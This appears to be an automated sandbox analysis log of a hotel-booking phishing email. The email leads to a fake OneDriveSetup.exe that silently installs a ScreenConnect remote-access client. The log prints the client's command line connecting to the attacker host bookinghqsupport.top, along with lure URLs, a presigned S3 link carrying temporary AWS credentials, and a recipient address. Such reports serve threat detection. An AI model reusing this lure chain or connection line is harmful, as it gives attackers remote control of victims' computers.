                      Source: global trafficHTTP traffic detected: GET /buildthefuturewithusholloway/tryandtrytogetbonus/downloads/OneDriveSetup.exe HTTP/1.1Host: bitbucket.orgConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /7efcf163-7ea0-4026-9851-6a4913a3f3f6/downloads/0b7cd0a7-2609-4f79-b2f4-29338930ef75/OneDriveSetup.exe?response-content-disposition=attachment%3B%20filename%3D%22OneDriveSetup.exe%22&AWSAccessKeyId=ASIA6KOSE3BNOI3AWRXW&Signature=UvJrF4LPfL%2BOBRzTrGtQPwq4JcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJHMEUCIQCGmsPLX0uw72pGadTpC1XFeeKGv0NrYuQPnWqyywCxKQIgEndcid7aMNuaesPseefl3yhGzqp3tu3zifXT8245m9gqpwIIUBAAGgw5ODQ1MjUxMDExNDYiDCMVxvVRMzlGFCK5xCqEAqM27j2pVY4pvbH0tzdiyo4uNRVpeDaZerhmA86UIviEgfS3OEGofnWHJufwLHEKXwGq4qU3xN9aJO7XM3NAiZ8xHgd8P0P7aAKVVOqw0Wc%2Fa6DnLl6rY%2Bm6Y%2FoIid0IxdJkj46sFUUJanfV0bgmH%2F%2ByPaOgbd15eDbfZ4%2FB6B7pZa6XHrO70ujQNR9uvBumywB3NlOoHU%2B3kCz4HLO81G4r9erRK3xkxQ3IG4KjURKVlpEnDa80mbxRKQTgSRsbOr9jR4vocvcAkGreZ2CxtUXIida2snlwCuMK05m9Njwzvm4K%2FB3uVzYoTwnW1tjPfVk21SeIU4AsfGZ3sn0G4ZzrpBHHMILorb4GOp0BWR%2BXPtM3UWQjqz7N5Oep1ydM07IIVzkSpCbuLlYi9eE9kQUt6pj6CKnfG1RgRkbnZGKs6GmYZiYewt7HEwLHTSQQZUi%2FTv2mUA%2Br1PZK%2BYCUlq2fzEAD2sPgi0MSeupREVU2RlmOC6M%2BIFhM8d6wA6c%2Bsw2bJedBLgJmf2LGV28%2BEV8Qu9m1UXXE1BMGdOGsG7FfpqHJagDCyKLkcw%3D%3D&Expires=1741388554 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /buildthefuturewithusholloway/tryandtrytogetbonus/downloads/OneDriveSetup.exe HTTP/1.1Host: bitbucket.orgConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: oceanbreeze.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /lander HTTP/1.1Host: oceanbreeze.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://oceanbreeze.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /adsense/domains/caf.js?abp=1&gdabp=true HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://oceanbreeze.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /v1/domains/domain?domain=oceanbreeze.com&portfolioId=&abp=1&gdabp=true HTTP/1.1Host: api.aws.parking.godaddy.comConnection: keep-aliveX-Request-Id: 1dd7154d-4c1f-4b0d-82f1-1560e1da66fcsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://oceanbreeze.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://oceanbreeze.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /v1/domains/domain?domain=oceanbreeze.com&portfolioId=&abp=1&gdabp=true HTTP/1.1Host: api.aws.parking.godaddy.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: AWSALBCORS=QLMNgBGKEee25WHpdpj/pfohwFxKGFj60aAPG94rtF22I/ZxWmQ3gcx1lSQ3ynoryvZ83Q2LpBhiIPyZfBpj2tOJiYUdIc68PHwRiLly/iUyfOQZgH2wdg/PI+Om; cpvisitor=a6538d19-8b8c-42fa-b74a-feee6c8cd65f
                      Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1Host: api.aws.parking.godaddy.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cpvisitor=a6538d19-8b8c-42fa-b74a-feee6c8cd65f; AWSALB=Yiw+XuGYjw7bHjztfbLne6Wc07HDy+4hlVemIAQC/XJF20xJ6C+W5JB9E5CFOJ1PLmhmzgsk2Da8j+lij5IiQsQiqdr2a7g4iTLkBvkV1ijB21hG+D4EsA4lC2BM; AWSALBCORS=Yiw+XuGYjw7bHjztfbLne6Wc07HDy+4hlVemIAQC/XJF20xJ6C+W5JB9E5CFOJ1PLmhmzgsk2Da8j+lij5IiQsQiqdr2a7g4iTLkBvkV1ijB21hG+D4EsA4lC2BM
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: onedrive.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: onedrive.live.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: onedrive.live.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://bookingmanageview.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /ajax/jQuery/jquery-1.9.1.min.js HTTP/1.1Host: ajax.aspnetcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css HTTP/1.1Host: assets.onestore.msConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /en-us/CMSScripts/script.jsx?k=f65ecb70-094d-0b11-7c9d-7da1bcadfaa7 HTTP/1.1Host: c.s-microsoft.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                      Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS

                      Spam, unwanted Advertisements and Ransom Demands

                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\564c49.msi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4F17.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4F38.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI512D.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\564c4b.msi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}\DefaultIcon
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7336_627564547
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (d241e538b9eb3f0a)
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (d241e538b9eb3f0a)\3cv5b3ep.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (d241e538b9eb3f0a)\3cv5b3ep.newcfg
                      Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI4F38.tmp
                      Source: classification engineClassification label: mal76.evad.winMSG@84/84@92/211
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeMutant created: NULL
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250307T1732400905-6892.etl
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI436F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5653593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg"
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "45AE51B9-404E-41AC-B6B3-06509E284573" "2B13D4B0-6C0C-40D8-AAB1-E470D827B26A" "6892" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                      Source: unknownProcess created: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe" -ServerName:microsoft.windowslive.mail.AppXfbjsbkxvprcgqg6q4c9jfr0pn3kv9x5s.mca
                      Source: unknownProcess created: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe" -ServerName:microsoft.windowslive.manageaccounts.AppXdbf3yp5apt3t7q877db3gnz5zqpf71zj.mca
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://cl.s12.exct.net/?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b547
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2028,i,4087323018114762375,9119903113655532610,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:3
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Downloads\OneDriveSetup (1).exe "C:\Users\user\Downloads\OneDriveSetup (1).exe"
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.4.4.9118\d241e538b9eb3f0a\ScreenConnect.ClientSetup.msi"
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0F46587D044F7C61BD85AC8DFD726F62 C
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 031E0E48DE3D13F9D2BD5DCF3BCB9F6E
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 92F38BA88A466C77B1F7FCBAC077F3D4 E Global\MSI0000
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bookinghqsupport.top&p=8041&s=8d8131d8-05a3-44ca-a0f5-2c7287519a41&k=BgIAAACkAABSU0ExAAgAAAEAAQCt6sszjYdR%2fljMO5hPN8Us4uYaE1KfX0EMr5MgD6WzfJDx5V16IAULD7anuBGtX0F3LF1idCdY6kpNAJJAQDV62l1xEtKhzqEJfLAHnrYNkI4IgddX3uDlj%2bQ5ccf18AynIy9sXt2XekatDPx%2bHEawZxuMC46pODU5uafzSkOJ3zhdQfKucobIYw%2f65wL6MiNAHyNGePUbZTnU97ItnoW%2bN22p2gzqZziqkFuuwABhjcLPNBQHLNuuKEC1vR2lxX3EzdRdKmLntP6LMt39dgW8sSIitIZom5OMFnV7U8H8LA819gdb3BqbA%2fSR%2fj57hzMJtK78Yzxu2%2fz9YPP9DzDB&c=OneDriveSetup%20FB&c=&c=&c=&c=&c=&c=&c="
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe" "RunRole" "9f785d80-c7b6-460e-b2b7-083465355376" "User"
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe" "RunRole" "685ea6e3-f4f1-4a5d-b64b-7c74b24aed78" "System"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k UnistackSvcGroup
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s lfsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"
                      Source: unknownProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\system32\services.msc"
                      Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.4.4.9118\d241e538b9eb3f0a\ScreenConnect.ClientSetup.msi"
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknown
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.networking.connectivity.dll
